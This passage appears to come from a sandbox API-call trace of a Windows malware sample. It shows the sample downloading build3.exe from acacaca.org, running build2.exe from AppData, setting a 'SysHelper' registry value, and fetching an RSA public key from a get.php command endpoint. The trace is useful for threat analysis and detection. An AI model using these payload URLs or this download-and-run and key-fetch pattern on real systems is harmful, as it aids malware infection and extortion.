lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.310] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.311] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.312] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.312] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.312] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.313] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.314] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.315] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.316] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.316] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.317] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.317] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.321] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.321] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.322] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.322] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.364] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.365] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.392] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.392] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.398] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.400] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2000) returned 1 [0107.401] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2000, lpOverlapped=0x0) returned 1 [0107.401] CloseHandle (hObject=0x544) returned 1 [0107.412] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0107.425] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0107.494] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\kEecfMwgj\\AppData\\Local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19\\build2.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0110.782] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b28688 | out: hHeap=0x2a0000) returned 1 [0110.783] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b75008 | out: hHeap=0x2a0000) returned 1 [0110.783] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0110.783] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x30) returned 0x2b9b430 [0110.783] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x852) returned 0x2bb6110 [0110.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b9b430, cbMultiByte=-1, lpWideCharStr=0x2bb6110, cchWideChar=1065 | out: lpWideCharStr="http://acacaca.org/files/1/build3.exe") returned 38 [0110.783] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x860) returned 0x2bb6970 [0110.783] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bb6110 | out: hHeap=0x2a0000) returned 1 [0110.783] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b9b430 | out: hHeap=0x2a0000) returned 1 [0110.783] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x860) returned 0x2bbb8f8 [0110.783] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x829) returned 0x2b75008 [0110.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://acacaca.org/files/1/build3.exe", cchWideChar=-1, lpMultiByteStr=0x2b75008, cbMultiByte=2089, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://acacaca.org/files/1/build3.exe", lpUsedDefaultChar=0x0) returned 38 [0110.784] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x830) returned 0x2bb6110 [0110.784] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b75008 | out: hHeap=0x2a0000) returned 1 [0110.784] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bbb8f8 | out: hHeap=0x2a0000) returned 1 [0110.784] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://acacaca.org/files/1/build3.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0111.543] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bb6110 | out: hHeap=0x2a0000) returned 1 [0111.543] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x91ad6d0, lpdwBufferLength=0x91ad710, lpdwIndex=0x0 | out: lpBuffer=0x91ad6d0*, lpdwBufferLength=0x91ad710*=0x4, lpdwIndex=0x0) returned 1 [0111.544] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bb6970 | out: hHeap=0x2a0000) returned 1 [0111.544] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b77a20 | out: hHeap=0x2a0000) returned 1 [0111.544] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b4db40 | out: hHeap=0x2a0000) returned 1 [0111.544] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b77618 | out: hHeap=0x2a0000) returned 1 [0111.545] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b4db08 | out: hHeap=0x2a0000) returned 1 [0111.545] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b4dad0 | out: hHeap=0x2a0000) returned 1 [0111.545] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b4da28 | out: hHeap=0x2a0000) returned 1 [0111.546] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b2ed68 | out: hHeap=0x2a0000) returned 1 [0111.546] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b723a8 | out: hHeap=0x2a0000) returned 1 Thread: id = 71 os_tid = 0xf08 [0106.110] timeGetTime () returned 0x13b0939 [0106.110] GetLastError () returned 0x54f [0106.110] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x3bc) returned 0x2b75e88 [0106.110] GetCurrentThreadId () returned 0xf08 [0106.110] SetLastError (dwErrCode=0x54f) [0106.143] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", ulOptions=0x0, samDesired=0xf003f, phkResult=0xf3aa5e4 | out: phkResult=0xf3aa5e4*=0x524) returned 0x0 [0106.143] RegQueryValueExW (in: hKey=0x524, lpValueName="SysHelper", lpReserved=0x0, lpType=0xf3aa5d8, lpData=0xf3aa5e0, lpcbData=0xf3aa5dc*=0x4 | out: lpType=0xf3aa5d8*=0x0, lpData=0xf3aa5e0*=0x0, lpcbData=0xf3aa5dc*=0x4) returned 0x2 [0106.144] RegSetValueExW (in: hKey=0x524, lpValueName="SysHelper", Reserved=0x0, dwType=0x4, lpData=0xf3aa5e0*=0x1, cbData=0x4 | out: lpData=0xf3aa5e0*=0x1) returned 0x0 [0106.144] RegCloseKey (hKey=0x524) returned 0x0 [0106.144] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0xf3aa4e4 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0106.144] PathAppendA (in: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0106.144] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x18) returned 0x2b158e0 [0106.186] AreFileApisANSI () returned 1 [0106.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf3aa4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0106.186] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x64) returned 0x3824a8 [0106.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf3aa4e4, cbMultiByte=-1, lpWideCharStr=0x3824a8, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt") returned 50 [0106.221] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xf3aa368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0106.221] GetLastError () returned 0x2 [0106.221] GetLastError () returned 0x2 [0106.221] SetLastError (dwErrCode=0x2) [0106.221] GetLastError () returned 0x2 [0106.221] SetLastError (dwErrCode=0x2) [0106.221] GetLastError () returned 0x2 [0106.221] SetLastError (dwErrCode=0x2) [0106.232] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x3824a8 | out: hHeap=0x2a0000) returned 1 [0106.232] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0010 [0106.232] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x50) returned 0x2b2ee70 [0106.232] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x30) returned 0x2b4d7c0 [0106.232] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x840) returned 0x2b70df8 [0106.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b4d7c0, cbMultiByte=-1, lpWideCharStr=0x2b70df8, cchWideChar=1056 | out: lpWideCharStr="BBBCA5C4A1C0DD06A87561C44E271CCC") returned 33 [0106.232] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x850) returned 0x2b71640 [0106.233] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b70df8 | out: hHeap=0x2a0000) returned 1 [0106.233] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b4d7c0 | out: hHeap=0x2a0000) returned 1 [0106.233] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x890) returned 0x2b82048 [0106.233] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b2ee70 | out: hHeap=0x2a0000) returned 1 [0106.233] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b71640 | out: hHeap=0x2a0000) returned 1 [0106.233] lstrcpyW (in: lpString1=0xf3aaf78, lpString2="http://acacaca.org/test2/get.php?pid=BBBCA5C4A1C0DD06A87561C44E271CCC" | out: lpString1="http://acacaca.org/test2/get.php?pid=BBBCA5C4A1C0DD06A87561C44E271CCC") returned="http://acacaca.org/test2/get.php?pid=BBBCA5C4A1C0DD06A87561C44E271CCC" [0106.233] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php?pid=BBBCA5C4A1C0DD06A87561C44E271CCC", lpString2="&first=true" | out: lpString1="http://acacaca.org/test2/get.php?pid=BBBCA5C4A1C0DD06A87561C44E271CCC&first=true") returned="http://acacaca.org/test2/get.php?pid=BBBCA5C4A1C0DD06A87561C44E271CCC&first=true" [0106.233] InternetOpenUrlW (hInternet=0xcc0010, lpszUrl="http://acacaca.org/test2/get.php?pid=BBBCA5C4A1C0DD06A87561C44E271CCC&first=true", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0018 [0111.506] InternetReadFile (in: hFile=0xcc0018, lpBuffer=0xf3aa778, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xf3aa604 | out: lpBuffer=0xf3aa778*, lpdwNumberOfBytesRead=0xf3aa604*=0x22d) returned 1 [0111.507] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0xf3aa670 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0111.507] PathAppendA (in: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0111.507] AreFileApisANSI () returned 1 [0111.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf3aa670, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0111.507] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x64) returned 0x382cf8 [0111.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf3aa670, cbMultiByte=-1, lpWideCharStr=0x382cf8, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt") returned 50 [0111.508] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0xf3aa47c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x600 [0111.508] GetFileType (hFile=0x600) returned 0x1 [0111.509] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x382cf8 | out: hHeap=0x2a0000) returned 1 [0111.509] lstrlenA (lpString="{\"public_key\":\"-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 557 [0111.509] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x1000) returned 0x2bbb8f8 [0111.509] WriteFile (in: hFile=0x600, lpBuffer=0xf3a9118*, nNumberOfBytesToWrite=0x22d, lpNumberOfBytesWritten=0xf3a8a44, lpOverlapped=0x0 | out: lpBuffer=0xf3a9118*, lpNumberOfBytesWritten=0xf3a8a44*=0x22d, lpOverlapped=0x0) returned 1 [0111.530] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bbb8f8 | out: hHeap=0x2a0000) returned 1 [0111.530] CloseHandle (hObject=0x600) returned 1 [0111.532] InternetCloseHandle (hInternet=0xcc0018) returned 1 [0111.533] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0111.534] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b82048 | out: hHeap=0x2a0000) returned 1 [0111.534] lstrlenA (lpString="{\"public_key\":\"") returned 15 [0111.534] lstrcpyA (in: lpString1=0xf3aab78, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0111.534] lstrcpyA (in: lpString1=0xf3aa778, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0111.534] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.534] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.534] lstrlenA (lpString="-----BEGIN PUBLIC 